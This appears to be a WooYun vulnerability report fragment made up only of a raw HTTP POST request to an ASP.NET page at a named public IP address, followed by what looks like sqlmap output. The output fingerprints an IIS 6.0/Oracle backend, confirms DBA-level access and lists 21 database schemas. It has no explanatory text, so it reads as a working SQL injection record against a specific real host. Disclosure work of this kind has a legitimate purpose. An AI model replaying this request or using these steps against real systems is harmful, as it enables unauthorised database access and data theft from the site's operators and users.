WooYun.org

POST /Message/Cardit.aspx HTTP/1.1
Host: 114.255.189.58
Proxy-Connection: keep-alive
Content-Length: 380
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://114.255.189.58
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1976.2 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://114.255.189.58/Message/Cardit.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTc4OTkyNDg0OQ9kFgICAw9kFgICDw88KwALAGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFDEltYWdlQnV0dG9uMT8aLp8YeyTD2ms9CZa5u5D4x50j&__EVENTVALIDATION=%2FwEWBgKYx6zXCALLwcg4Avf14qgNAuSW7PAJAun1sPAGAtLCmdMIL3op6DVLtgbieS2lYSwP0yTxYgc%3D&delete_rec=&txt_dDCDate=&fltno=1&dep_port=1&arr_port=1&ImageButton1.x=20&ImageButton1.y=10

web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Oracle
[17:42:40] [INFO] fetching current database
[17:42:43] [INFO] retrieved: EM
[17:42:43] [WARNING] on Oracle you'll need to use schema names for enumeration a
s the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle):    'EM'
[17:42:43] [INFO] testing if current user is DBA
current user is DBA:    True

available databases [21]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EM
[*] EXFSYS
[*] HR
[*] IX
[*] MDSYS
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB